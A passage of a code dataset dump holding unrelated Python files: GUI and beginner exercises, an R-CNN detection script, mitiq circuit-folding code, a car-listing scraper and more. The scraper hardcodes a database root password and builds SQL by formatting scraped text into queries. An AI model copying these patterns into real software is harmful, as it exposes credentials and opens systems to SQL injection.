кнопку\", pady=\"30\", bg=\"NavajoWhite2\", 
fg=\"#885144\").pack()\n\nuser_entry.bind('',add_label)\n\nwindow.mainloop()","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"592528744","text":"\"\"\"\nPodemos pedir a quantidade de entrada que for necessária a cada passagem\npor um laço while. Vamos criar um programa de enquete em que cada\npassagem pelo laço solicita o nome do participante e uma resposta.\nArmazenaremos os dados coletados em um dicionário, pois queremos\nassociar cada resposta a um usuário em particular:\n\"\"\"\n\nrespostas = {}\n\n#Define uma flag para indicar que a enquete está ativa\npesquisa_ativa = True\n\nwhile pesquisa_ativa:\n #Pede o nome da pessoa e a resposta\n nome = input(\"\\nQual é o seu nome? \")\n resposta = input(\"Qual montanha você gostaria de escalar um dia? \")\n\n #Armazena a resposta no dicionário\n respostas[nome] = resposta\n\n #Descobre se outra pessoa vai responder à enquete\n repetir = input(\"Gostaria de deixar outra pessoa responder? (Sim / Não) \")\n if repetir == 'não':\n pesquisa_ativa = False\n\n#A enquete foi concluída. Mostra os resultados\nprint(\"\\n--- Resultados da Pesquisa ---\")\nfor nome, resposta in respostas.items():\n print(nome + \" gostaria de subir no(a) \" + resposta + \".\")","sub_path":"Capitulo 7/montanha_pesquisa.py","file_name":"montanha_pesquisa.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"175367279","text":"# coding=utf8\n# Create by 吴俊 on 2016/5/12\n\nimport re\n\n\n# 去除文本中html标签并保留原格式工具类\n# 使用方法:\n# # from Tool import *\n# # tool = Tool()\n# # tool.replaceHTMLTag(html)\nclass Tool:\n\tdef __init__(self):\n\t\t# 去除img标签,7位长空格\n\t\tself.removeImg = re.compile(u'| {7}|')\n\t\t# 删除超链接标签\n\t\tself.removeAddr = re.compile(u'|')\n\t\t# 把换行的标签换为\\n\n\t\tself.repalceLine = re.compile(u'|
    |
    |

    ')\n\t\t# 将表格制表替换为\\t\n\t\tself.repalceTD = re.compile(u'')\n\t\t# 把段落开头换为\\n加两空格\n\t\tself.repalcePara = re.compile(u'')\n\t\t# 将换行符或双换行符替换为\\n\n\t\tself.repalceBR = re.compile(u'
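\n\n# Quick usage sketch (the sample HTML below is invented for illustration):\n#\n#   tool = Tool()\n#   tool.replaceHTMLTag(u'<div>hello<br><a href=\"#\">world</a></div>')\n#   # -> u'hello\\nworld': the <div>/<br> tags become line breaks and the\n#   # hyperlink tags are stripped while the text itself is preserved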
\n\nif __name__ == '__main__':\n\tprint(u'这是一个去除文本中html标签并保留原格式工具类')\n","sub_path":"BaiDuTieBa/Tool.py","file_name":"Tool.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"509190152","text":"import os\nimport argparse\nimport time\nimport _thread\n\nimport _init_paths # pylint: disable=unused-import\n\nfrom urllib import request\nimport cv2\nimport numpy as np\nimport base64\nimport urllib3\nimport uuid\n\nimport torch\n\nfrom rcnn.core.config import cfg, merge_cfg_from_file, merge_cfg_from_list, assert_and_infer_cfg\nfrom rcnn.modeling.parsing_rcnn.inference import parsing_results\nfrom rcnn.core.test_engine import initialize_model_from_cfg\nimport rcnn.core.test as rcnn_test\n\n# Parse arguments\nparser = argparse.ArgumentParser(description='Hier R-CNN Detect')\nparser.add_argument('--cfg', dest='cfg_file',\n help='optional config file',\n default='./cfgs/mscoco_humanparts/e2e_hier_rcnn_R-50-FPN_1x.yaml', type=str)\nparser.add_argument('--gpu_id', type=str, default='0,1,2,3,4,5,6,7', help='gpu id for evaluation')\nparser.add_argument('opts', help='See rcnn/core/config.py for all options',\n default=None,\n nargs=argparse.REMAINDER)\nargs = parser.parse_args()\nos.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id\n\n# HTTP connection pool\nhttp_client = urllib3.PoolManager()\n\ndef main():\n if len(args.gpu_id.split(',')) == 1:\n local_rank = int(args.gpu_id.split(',')[0])\n else:\n local_rank = -1\n args.local_rank = local_rank\n\n num_gpus = len(args.gpu_id.split(','))\n multi_gpu_testing = True if num_gpus > 1 else False\n\n if args.cfg_file is not None:\n merge_cfg_from_file(args.cfg_file)\n if args.opts is not None:\n merge_cfg_from_list(args.opts)\n\n assert_and_infer_cfg(make_immutable=False)\n args.test_net_file, _ = os.path.splitext(__file__)\n\n model = initialize_model_from_cfg()\n\n start_time = time.time()\n image = cv2.imread('', cv2.IMREAD_COLOR)\n box_results, par_results, par_score = detect(model, image)\n print(' cost: ' + str(time.time() - start_time))\n\n print(dict(\n boxes=box_results,\n parss=par_results,\n pscores=par_score,\n ))\n\ndef get_image_from_base64(base64_code):\n ''' \n Decode a base64 string into an OpenCV image object\n '''\n img_data = base64.b64decode(base64_code)\n return read_image(img_data)\n\ndef get_image_from_url(url):\n '''\n Fetch an image URL and turn it into an OpenCV image object\n '''\n img_data = http_client.request(\"GET\", url).data\n print(len(img_data))\n return read_image(img_data)\n\ndef read_image(img_data):\n '''\n Turn a byte buffer into an OpenCV image object\n '''\n imgArray = np.frombuffer(img_data, np.uint8)\n img = cv2.imdecode(imgArray, cv2.IMREAD_COLOR)\n # cv2.imwrite('/Users/kevin/Downloads/2020.jpg', img)\n return img
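\n\n# e.g. (sketch; 'sample.jpg' is a stand-in path): both helpers above funnel\n# through read_image, so a local file can be exercised the same way:\n#\n#   with open('sample.jpg', 'rb') as f:\n#       img = read_image(f.read())   # BGR numpy array, ready for detect()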
print(\"2 cost: \" + str(time.time() - start_time))\n start_time = time.time()\n if cfg.MODEL.PARSING_ON:\n result = rcnn_test.im_detect_parsing(model, results, features)\n print(\"3 cost: \" + str(time.time() - start_time))\n start_time = time.time()\n\n if not results or len(results) != 1 or len(results[0]) == 0:\n return None\n\n image_height = image.shape[0]\n image_width = image.shape[1]\n\n cpu_device = torch.device(\"cpu\")\n result = result[0].to(cpu_device)\n result = result.resize((image_width, image_height))\n \n return post_processing(result, image)\n\ndef post_processing(result, image):\n start_time = time.time()\n box_results = prepare_box_results(result, image)\n print(\"4 cost: \" + str(time.time() - start_time))\n start_time = time.time()\n\n if cfg.MODEL.PARSING_ON:\n par_results, par_score = prepare_parsing_results(result, image)\n print(\"5 cost: \" + str(time.time() - start_time))\n start_time = time.time()\n else:\n par_results = []\n par_score = []\n\n return box_results, par_results, par_score\n\ndef prepare_box_results(result, image):\n scores = result.get_field(\"scores\").tolist()\n result = result.convert(\"xywh\")\n boxes = result.bbox.tolist()\n\n return [\n {\n \"bbox\": box,\n \"score\": scores[k],\n }\n for k, box in enumerate(boxes)\n ]\n\ndef prepare_parsing_results(result, image):\n semseg = result.get_field(\"semseg\") if cfg.MODEL.SEMSEG_ON else None\n parsing = result.get_field(\"parsing\")\n parsing = parsing_results(parsing, result, semseg=semseg)\n scores = result.get_field(\"parsing_scores\")\n\n return parsing, scores\n\nif __name__ == '__main__':\n main()","sub_path":"tools/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"648423693","text":"\"\"\"Functions for folding gates in valid mitiq circuits.\n\nPublic functions work for any circuit types supported by mitiq.\nPrivate functions work only for iternal mitiq circuit representations.\n\"\"\"\nfrom copy import deepcopy\nfrom typing import Any, Callable, Iterable, List, Optional, Tuple, Union\n\nimport numpy as np\n\nfrom cirq import Circuit, InsertStrategy, inverse, ops\nfrom mitiq import QPROGRAM, SUPPORTED_PROGRAM_TYPES\n\n\nclass UnsupportedCircuitError(Exception):\n pass\n\n\n# Helper functions\ndef _is_measurement(op: ops.Operation) -> bool:\n \"\"\"Returns true if the operation's gate is a measurement, else False.\n\n Args:\n op: Gate operation.\n \"\"\"\n return isinstance(op.gate, ops.measurement_gate.MeasurementGate)\n\n\ndef _pop_measurements(\n circuit: Circuit,\n) -> List[List[Union[int, ops.Operation]]]:\n \"\"\"Removes all measurements from a circuit.\n\n Args:\n circuit: a quantum circuit as a :class:`cirq.Circuit` object.\n\n Returns:\n measurements: list\n \"\"\"\n measurements = [\n list(m) for m in circuit.findall_operations(_is_measurement)\n ]\n circuit.batch_remove(measurements)\n return measurements\n\n\ndef _append_measurements(\n circuit: Circuit, measurements: List[Union[int, ops.Operation]]\n) -> None:\n \"\"\"Appends all measurements into the final moment of the circuit.\n\n Args:\n circuit: a quantum circuit as a :class:`cirq.Circuit`.\n measurements: measurements to perform.\n \"\"\"\n for i in range(len(measurements)):\n measurements[i][0] = (\n len(circuit) + 1\n ) # Make sure the moment to insert into is the last in the circuit\n circuit.batch_insert(measurements)\n\n\n# Conversions\ndef convert_to_mitiq(circuit: QPROGRAM) -> 
\n\n\n# Conversions\ndef convert_to_mitiq(circuit: QPROGRAM) -> Tuple[Circuit, str]:\n \"\"\"Converts any valid input circuit to a mitiq circuit.\n\n Args:\n circuit: Any quantum circuit object supported by mitiq.\n See mitiq.SUPPORTED_PROGRAM_TYPES.\n\n Raises:\n UnsupportedCircuitError: If the input circuit is not supported.\n\n Returns:\n circuit: Mitiq circuit equivalent to input circuit.\n input_circuit_type: Type of input circuit represented by a string.\n \"\"\"\n if \"qiskit\" in circuit.__module__:\n from mitiq.mitiq_qiskit.conversions import _from_qiskit\n input_circuit_type = \"qiskit\"\n mitiq_circuit = _from_qiskit(circuit)\n elif isinstance(circuit, Circuit):\n input_circuit_type = \"cirq\"\n mitiq_circuit = circuit\n else:\n raise UnsupportedCircuitError(\n f\"Circuit from module {circuit.__module__} is not supported.\\n\\n\" +\n f\"Circuit types supported by mitiq are \\n{SUPPORTED_PROGRAM_TYPES}\"\n )\n return mitiq_circuit, input_circuit_type\n\n\ndef convert_from_mitiq(circuit: Circuit, conversion_type: str) -> QPROGRAM:\n \"\"\"Converts a mitiq circuit to a type specified by the conversion type.\n\n Args:\n circuit: Mitiq circuit to convert.\n conversion_type: String specifier for the converted circuit type.\n \"\"\"\n if conversion_type == \"qiskit\":\n from mitiq.mitiq_qiskit.conversions import _to_qiskit\n converted_circuit = _to_qiskit(circuit)\n elif isinstance(circuit, Circuit):\n converted_circuit = circuit\n else:\n raise UnsupportedCircuitError(\n f\"Conversion to circuit of type {conversion_type} is not supported.\"\n f\"\\nCircuit types supported by mitiq are {SUPPORTED_PROGRAM_TYPES}\"\n )\n return converted_circuit
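\n\n# e.g. (sketch): a cirq circuit round-trips through the mitiq representation\n# unchanged:\n#\n#   import cirq\n#   circ = cirq.Circuit([ops.X(cirq.LineQubit(0))])\n#   mitiq_circ, in_type = convert_to_mitiq(circ)   # in_type == \"cirq\"\n#   convert_from_mitiq(mitiq_circ, in_type)        # returns the same Circuit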
\n\n\ndef converter(fold_method: Callable) -> Callable:\n \"\"\"Decorator for handling conversions.\"\"\"\n def new_fold_method(circuit: QPROGRAM, *args, **kwargs) -> QPROGRAM:\n mitiq_circuit, input_circuit_type = convert_to_mitiq(circuit)\n if kwargs.get(\"keep_input_type\"):\n return convert_from_mitiq(\n fold_method(mitiq_circuit, *args, **kwargs), input_circuit_type\n )\n return fold_method(mitiq_circuit, *args, **kwargs)\n return new_fold_method\n\n\n# Gate level folding\ndef _fold_gate_at_index_in_moment(\n circuit: Circuit, moment_index: int, gate_index: int\n) -> None:\n \"\"\"Replaces, in a circuit, the gate G in (moment, index) with G G^dagger G.\n\n Args:\n circuit: Circuit to fold.\n moment_index: Moment in which the gate sits in the circuit.\n gate_index: Index of the gate within the specified moment.\n \"\"\"\n op = circuit[moment_index].operations[gate_index]\n circuit.insert(\n moment_index, [op, inverse(op)], strategy=InsertStrategy.NEW\n )\n\n\ndef _fold_gates_in_moment(\n circuit: Circuit, moment_index: int, gate_indices: Iterable[int]\n) -> None:\n \"\"\"Modifies the input circuit by applying the map G -> G G^dag G to all\n gates specified by the input moment index and gate indices.\n\n Args:\n circuit: Circuit to fold.\n moment_index: Index of moment to fold gates in.\n gate_indices: Indices of gates within the moments to fold.\n \"\"\"\n for (i, gate_index) in enumerate(gate_indices):\n _fold_gate_at_index_in_moment(\n circuit, moment_index + 2 * i, gate_index\n ) # Each fold adds two moments\n\n\n@converter\ndef fold_gates(\n circuit: QPROGRAM,\n moment_indices: Iterable[int],\n gate_indices: List[Iterable[int]],\n **kwargs,\n) -> QPROGRAM:\n \"\"\"Returns a new circuit with specified gates folded.\n\n Args:\n circuit: Circuit to fold.\n moment_indices: Indices of moments with gates to be folded.\n gate_indices: Specifies which gates within each moment to fold.\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: the folded quantum circuit as a :class:`cirq.Circuit` object.\n\n Examples:\n (1) Folds the first three gates in moment two.\n >>> fold_gates(circuit, moment_indices=[1], gate_indices=[(0, 1, 2)])\n\n (2) Folds gates with indices 1, 4, and 5 in moment 0,\n and gates with indices 0, 1, and 2 in moment 1.\n >>> fold_gates(circuit, moment_indices=[0, 3],\n >>> gate_indices=[(1, 4, 5), (0, 1, 2)])\n \"\"\"\n folded = deepcopy(circuit)\n moment_index_shift = 0\n for (i, moment_index) in enumerate(moment_indices):\n _fold_gates_in_moment(\n folded, moment_index + moment_index_shift, gate_indices[i]\n )\n moment_index_shift += 2 * len(\n gate_indices[i]\n ) # Folding gates adds moments\n return folded\n\n\ndef _fold_moments(circuit: Circuit, moment_indices: List[int]) -> None:\n \"\"\"Folds specified moments in the circuit in place.\n\n Args:\n circuit: Circuit to fold.\n moment_indices: Indices of moments to fold in the circuit.\n\n \"\"\"\n shift = 0\n for i in moment_indices:\n circuit.insert(\n i + shift, [circuit[i + shift], inverse(circuit[i + shift])]\n )\n shift += 2\n\n\n@converter\ndef fold_moments(circuit: QPROGRAM,\n moment_indices: List[int],\n **kwargs\n ) -> QPROGRAM:\n \"\"\"Returns a new circuit with moments folded by mapping\n\n M_i -> M_i M_i^dag M_i\n\n where M_i is a moment specified by an integer in moment_indices.\n\n Args:\n circuit: Circuit to apply folding operation to.\n moment_indices: List of integers that specify moments to fold.\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: the folded quantum circuit as a :class:`cirq.Circuit` object.\n \"\"\"\n folded = deepcopy(circuit)\n _fold_moments(folded, moment_indices)\n return folded\n\n\ndef _fold_all_gates_locally(circuit: Circuit) -> None:\n \"\"\"Replaces every gate G with G G^dag G by modifying the circuit in place.\n \"\"\"\n _fold_moments(circuit, list(range(len(circuit))))\n\n\ndef _get_num_to_fold(stretch: float, ngates: int) -> int:\n \"\"\"Returns the number of gates to fold to achieve the desired (approximate)\n stretch factor.\n\n Args:\n stretch: Floating point value to stretch the circuit by.\n ngates: Number of gates in the circuit to stretch.\n \"\"\"\n return int(round(ngates * (stretch - 1.0) / 2.0))
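\n\n# e.g.: for a 10-gate circuit and stretch = 2.0,\n# _get_num_to_fold(2.0, 10) == int(round(10 * (2.0 - 1.0) / 2.0)) == 5;\n# folding those 5 gates adds 2 * 5 = 10 gates, giving 20 = 2.0 * 10 in total.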
\n\n\n@converter\ndef fold_gates_from_left(\n circuit: QPROGRAM, stretch: float, **kwargs\n) -> QPROGRAM:\n \"\"\"Returns a new folded circuit by applying the map G -> G G^dag G to a\n subset of gates of the input circuit, starting with gates at the\n left (beginning) of the circuit.\n\n The folded circuit has a number of gates approximately equal to\n stretch * n where n is the number of gates in the input circuit.\n\n Args:\n circuit: Circuit to fold.\n stretch: Factor to stretch the circuit by. Any real number in [1, 3].\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: the folded quantum circuit as a :class:`cirq.Circuit` object.\n\n Note:\n Folding a single gate adds two gates to the circuit,\n hence the maximum stretch factor is 3.\n \"\"\"\n if not circuit.are_all_measurements_terminal():\n raise ValueError(\n f\"Input circuit contains intermediate measurements\"\n \" and cannot be folded.\"\n )\n\n if not 1 <= stretch <= 3:\n raise ValueError(\n \"The stretch factor must be a real number between 1 and 3.\"\n )\n\n folded = deepcopy(circuit)\n\n measurements = _pop_measurements(folded)\n\n ngates = len(list(folded.all_operations()))\n num_to_fold = _get_num_to_fold(stretch, ngates)\n if num_to_fold == 0:\n _append_measurements(folded, measurements)\n return folded\n num_folded = 0\n moment_shift = 0\n\n for (moment_index, moment) in enumerate(circuit):\n for gate_index in range(len(moment)):\n _fold_gate_at_index_in_moment(\n folded, moment_index + moment_shift, gate_index\n )\n moment_shift += 2\n num_folded += 1\n if num_folded == num_to_fold:\n _append_measurements(folded, measurements)\n return folded\n\n\n@converter\ndef fold_gates_from_right(\n circuit: QPROGRAM, stretch: float, **kwargs\n) -> QPROGRAM:\n \"\"\"Returns a new folded circuit by applying the map G -> G G^dag G\n to a subset of gates of the input circuit, starting with gates at\n the right (end) of the circuit.\n\n The folded circuit has a number of gates approximately equal to\n stretch * n where n is the number of gates in the input circuit.\n\n Args:\n circuit: Circuit to fold.\n stretch: Factor to stretch the circuit by. Any real number in [1, 3].\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: the folded quantum circuit as a :class:`cirq.Circuit` object.\n\n Note:\n Folding a single gate adds two gates to the circuit,\n hence the maximum stretch factor is 3.\n \"\"\"\n if not circuit.are_all_measurements_terminal():\n raise ValueError(\n f\"Input circuit contains intermediate measurements\"\n \" and cannot be folded.\"\n )\n\n measurements = _pop_measurements(circuit)\n\n reversed_circuit = Circuit(reversed(circuit))\n reversed_folded_circuit = fold_gates_from_left(reversed_circuit, stretch)\n folded = Circuit(reversed(reversed_folded_circuit))\n _append_measurements(folded, measurements)\n return folded\n\n\ndef _update_moment_indices(\n moment_indices: dict, moment_index_where_gate_was_folded: int\n) -> dict:\n \"\"\"Updates moment indices to keep track of an original circuit\n throughout folding.\n\n Args:\n moment_indices: A dictionary in the format\n {index of moment in original circuit: index of moment\n in folded circuit}\n\n moment_index_where_gate_was_folded: Index of the moment\n in which a gate was folded.\n\n Returns:\n moment_indices: dictionary with updated moments.\n\n Note:\n `moment_indices` should start out as\n {0: 0, 1: 1, ..., M - 1: M - 1} where M is the # of moments in the\n original circuit. 
As the circuit is folded, moment indices change.\n\n If a gate in the last moment is folded, moment_indices gets updated to\n {0: 0, 1: 1, ..., M - 1: M + 1} since two moments are created in the\n process of folding the gate in the last moment.\n\n TODO:\n If another gate from the last moment is folded, we could put it\n in the same moment as the previous folded gate.\n \"\"\"\n if moment_index_where_gate_was_folded not in moment_indices.keys():\n raise ValueError(\n f\"Moment index {moment_index_where_gate_was_folded} not in moment\"\\\n \" indices\"\n )\n for i in moment_indices.keys():\n moment_indices[i] += 2 * int(i >= moment_index_where_gate_was_folded)\n return moment_indices\n\n\n@converter\ndef fold_gates_at_random(\n circuit: QPROGRAM, stretch: float, seed: Optional[int] = None, **kwargs\n) -> QPROGRAM:\n \"\"\"Returns a folded circuit by applying the map G -> G G^dag G to a random\n subset of gates in the input circuit.\n\n The folded circuit has a number of gates approximately equal to\n stretch * n where n is the number of gates in the input circuit.\n\n Args:\n circuit: Circuit to fold.\n stretch: Factor to stretch the circuit by. Any real number in [1, 3].\n seed: [Optional] Integer seed for random number generator.\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: The folded quantum circuit as a :class:`cirq.Circuit` object.\n\n Note:\n Folding a single gate adds two gates to the circuit, hence the maximum\n stretch factor is 3.\n \"\"\"\n if not circuit.are_all_measurements_terminal():\n raise ValueError(\n \"Input circuit contains intermediate measurements\"\n \" and cannot be folded.\"\n )\n\n if not 1 <= stretch <= 3:\n raise ValueError(\n \"The stretch factor must be a real number between 1 and 3.\"\n )\n\n folded = deepcopy(circuit)\n\n measurements = _pop_measurements(folded)\n\n if np.isclose(stretch, 3.0, atol=1e-3):\n _fold_all_gates_locally(folded)\n _append_measurements(folded, measurements)\n return folded\n\n if seed is not None:\n np.random.seed(seed)\n\n ngates = len(list(folded.all_operations()))\n num_to_fold = _get_num_to_fold(stretch, ngates)\n\n # Keep track of where moments are in the folded circuit\n moment_indices = {i: i for i in range(len(circuit))}\n\n # Keep track of which gates we can fold in each moment\n remaining_gate_indices = {\n moment: list(range(len(circuit[moment])))\n for moment in range(len(circuit))\n }\n\n # Any moment with at least one gate is fair game\n remaining_moment_indices = [\n i for i in remaining_gate_indices.keys() if remaining_gate_indices[i]\n ]\n\n for _ in range(num_to_fold):\n # Get a moment index and gate index from the remaining set\n moment_index = np.random.choice(remaining_moment_indices)\n gate_index = np.random.choice(remaining_gate_indices[moment_index])\n\n # Do the fold\n _fold_gate_at_index_in_moment(\n folded, moment_indices[moment_index], gate_index\n )\n\n # Update the moment indices for the folded circuit\n _update_moment_indices(moment_indices, moment_index)\n\n # Remove the gate we folded from the remaining set of gates to fold\n remaining_gate_indices[moment_index].remove(gate_index)\n\n # If there are no gates left in the moment,\n # remove the moment index from the remaining set\n if not remaining_gate_indices[moment_index]:\n remaining_moment_indices.remove(moment_index)\n\n _append_measurements(folded, measurements)\n return folded\n\n\n@converter\ndef fold_local(\n circuit: QPROGRAM,\n stretch: float,\n fold_method: 
Callable[\n [Circuit, float, Tuple[Any]], Circuit\n ] = fold_gates_from_left,\n fold_method_args: Tuple[Any] = (),\n **kwargs\n) -> QPROGRAM:\n \"\"\"Returns a folded circuit by folding gates according to the input\n fold method.\n\n Args:\n circuit: Circuit to fold.\n stretch: Factor to stretch the circuit by.\n fold_method: Function which defines the method for folding gates.\n fold_method_args: Any additional input arguments for the fold_method.\n The method is called with\n fold_method(circuit, stretch, *fold_method_args).\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: The folded quantum circuit as a :class:`cirq.Circuit` object.\n\n Example:\n >>> fold_method = fold_gates_at_random\n >>> fold_method_args = (1,)\n Uses a seed of one for the fold_gates_at_random method.\n\n Note:\n `fold_method` defines the strategy for folding gates, which could be\n folding gates at random, from the left of the circuit,\n or custom strategies.\n\n The signature of `fold_method` must be\n ```\n def fold_method(circuit: Circuit, stretch: float,**kwargs):\n ...\n ```\n and return a circuit.\n \"\"\"\n folded = deepcopy(circuit)\n\n if np.isclose(stretch, 1.0, atol=1e-2):\n return folded\n\n if not 1 <= stretch:\n raise ValueError(\n f\"The stretch factor must be a real number greater than 1.\"\n )\n\n while stretch > 1.0:\n this_stretch = 3.0 if stretch > 3.0 else stretch\n folded = fold_method(folded, this_stretch, *fold_method_args)\n stretch /= 3.0\n return folded\n\n\n# Circuit level folding\n@converter\ndef fold_global(circuit: QPROGRAM, stretch: float, **kwargs) -> QPROGRAM:\n \"\"\"Gives a circuit by folding the global unitary of the input circuit.\n\n The returned folded circuit has a number of gates approximately equal to\n stretch * len(circuit).\n\n Args:\n circuit: Circuit to fold.\n stretch: Factor to stretch the circuit by.\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: The folded quantum circuit as a :class:`cirq.Circuit` object.\n \"\"\"\n if not (stretch >= 1):\n raise ValueError(\"The stretch factor must be a real number >= 1.\")\n\n if not circuit.are_all_measurements_terminal():\n raise ValueError(\n \"Input circuit contains intermediate measurements\"\n \" and cannot be folded.\"\n )\n\n folded = deepcopy(circuit)\n measurements = _pop_measurements(folded)\n base_circuit = deepcopy(folded)\n\n # Determine the number of global folds and the final fractional stretch\n num_global_folds, fractional_stretch = divmod(stretch - 1, 2)\n # Do the global folds\n for _ in range(int(num_global_folds)):\n folded += Circuit(inverse(base_circuit), base_circuit)\n\n # Fold remaining gates until the stretch is reached\n ops = list(base_circuit.all_operations())\n num_to_fold = int(round(fractional_stretch * len(ops) / 2))\n\n if num_to_fold > 0:\n folded += Circuit([inverse(ops[-num_to_fold:])], [ops[-num_to_fold:]])\n\n _append_measurements(folded, measurements)\n return folded\n","sub_path":"artifacts/minimal_bugfixes/mitiq/mitiq#125/after/folding.py","file_name":"folding.py","file_ext":"py","file_size_in_byte":19792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"646759470","text":"'''\nWrite a Python program to get the factorial of a non-negative integer.\n'''\n\ndef factorial(num):\n if num <= 1:\n return 1\n else:\n return num * factorial(num - 1)\n\nprint 
(factorial(13))","sub_path":"Recursion/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"635109058","text":"'''\n 5단계\n 각 페이지에서 제목/가격/판매자명을 DB에 저장\n 한글은 int 타입 컬럼에 입력불가한 관계로,\n 판매완료는 0, 계약은 1로 저장함\n'''\n# 1) 필요한 라이브러리 import\nfrom bs4 import BeautifulSoup as bs\nfrom urllib.request import urlopen\nfrom google.cloud import storage as gcs\nimport os, pymysql, time\n\nconn = pymysql.connect(host='34.64.176.78', port=3306,\n db='mycar', user='root', password='admin1234',\n charset='utf8')\n\ncursor = conn.cursor()\nsql = \"select idx,url from intercar where price is null\"\ncursor.execute(sql)\nurls = cursor.fetchall()\n\nfor idxurl in urls:\n # 차량 각 상세페이지 열기\n idx,url = idxurl\n print(\"idx : \", idx)\n html = urlopen(url)\n soup = bs(html, \"html.parser\")\n title = soup.select_one('div.title-area h3.tit').text\n price = soup.select_one('div.price-area b').text.replace(',','')\n seller = soup.select_one('div.seller-data div.seller-state b').text\n\n if price=='[판매완료]':\n update_sql = \"UPDATE intercar SET title='{}',price=0,seller='{}' where idx={}\".format(title, seller,idx)\n elif price=='[계약]':\n update_sql = \"UPDATE intercar SET title='{}',price=1,seller='{}' where idx={}\".format(title, seller, idx)\n elif price=='[가격상담]':\n update_sql = \"UPDATE intercar SET title='{}',price=2,seller='{}' where idx={}\".format(title, seller, idx)\n elif price=='[보류]':\n update_sql = \"UPDATE intercar SET title='{}',price=3,seller='{}' where idx={}\".format(title, seller, idx)\n else:\n update_sql = \"UPDATE intercar SET title='{}',price={},seller='{}' where idx={}\".format(title,price,seller,idx)\n print(update_sql)\n cursor.execute(update_sql)\n conn.commit()\n\ncursor.close()\nconn.close()\nprint('완료')\n\n\n","sub_path":"imgcrawling5.py","file_name":"imgcrawling5.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498559333","text":"import argparse\n\nfrom python_qt_binding import QT_BINDING\nfrom python_qt_binding.QtCore import qDebug\nfrom rqt_gui_py.plugin import Plugin\n\nfrom rqt_py_common.ini_helper import pack, unpack\n\nfrom .plot_widget import PlotWidget\n\nfrom .data_plot import DataPlot\n\nclass Plot(Plugin):\n \n def __init__(self , context):\n super(Plot , self).__init__(context)\n self.setObjectName('plot')\n \n self._context = context\n self._widget = PlotWidget()\n self._data_plot = DataPlot(self._widget)\n \n #set parameters of data_plot \n self._data_plot.set_autoscale(x=False)\n self._data_plot.set_autoscale(y=DataPlot.SCALE_EXTEND | DataPlot.SCALE_VISIBLE)\n self._data_plot.set_xlim([0 , 10.0])\n \n self._widget.switch_data_plot_widget(self._data_plot)\n \n if context.serial_number() > 1:\n self._widget.setWindowTitle(self._widget.windowTitle() + (' (%d)' % context.serial_number()))\n context.add_widget(self._widget)\n \n def _update_title(self):\n #self._widget.setWindowTitle(self._data_plot.getTitle())\n if self._context.serial_number() > 1:\n self._widget.setWindowTitle(self._widget.windowTitle() + (' (%d)' % self._context.serial_number())) \n \n def save_settings(self, plugin_settings, instance_settings):\n self._data_plot.save_settings(plugin_settings, instance_settings)\n \n def restore_settings(self, plugin_settings, instance_settings):\n self._update_title()\n self._data_plot.restore_settings(plugin_settings, instance_settings) \n \n def 
trigger_configuration(self):\n self._data_plot.doSettingsDialog()\n self._update_title()\n\n def shutdown_plugin(self):\n self._widget.clean_up_subscribers() \n \n \n \n ","sub_path":"dragon_visualization/rqt_plot_rf/src/rqt_plot_rf/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"468888947","text":"class Stock:\n def __init__(self):\n self.first = None\n \n def add(self, product):\n t = product\n t.next = self.first\n self.first = t \n\n def list(self):\n s = self.first.toString() + \"\\n\"\n t = self.first.next\n while(t != None):\n s += t.toString() + \"\\n\"\n t = t.next\n\n return s;\n\n def delete(self, id):\n t = self.first\n while(t != None and t.next.id != id):\n t = t.next\n \n t.next = t.next.next\n return True;\n \n def search(self, id):\n t = self.first\n while(t != None and t.id != id ):\n t = t.next\n \n if(t == None):\n return None\n if(t.id == id):\n return t\n ","sub_path":"DataStructure/CRUD Simple Lists/Stock.py","file_name":"Stock.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"287960993","text":"import logging\n\nimport click\n\nimport packit\nfrom packit.cli.sourcegit_to_dist_git import sg2dg\nfrom packit.cli.sourcegit_to_srpm import sg2srpm\nfrom packit.cli.watch_fedora_ci import watcher\nfrom packit.cli.watch_sg_pr import watch_pr\nfrom packit.config import Config, get_context_settings\nfrom packit.utils import set_logging\n\nlogger = logging.getLogger(__name__)\n\n\n@click.group(\"packit\", context_settings=get_context_settings())\n@click.option(\"-d\", \"--debug\", is_flag=True)\n@click.option(\"--fas-user\")\n@click.option(\"-k\", \"--keytab\")\n@click.option(\"-v\", \"--verbose\", is_flag=True)\n@click.pass_context\ndef packit_base(ctx, **kwargs):\n ctx.obj = Config(**kwargs)\n if ctx.obj.debug:\n 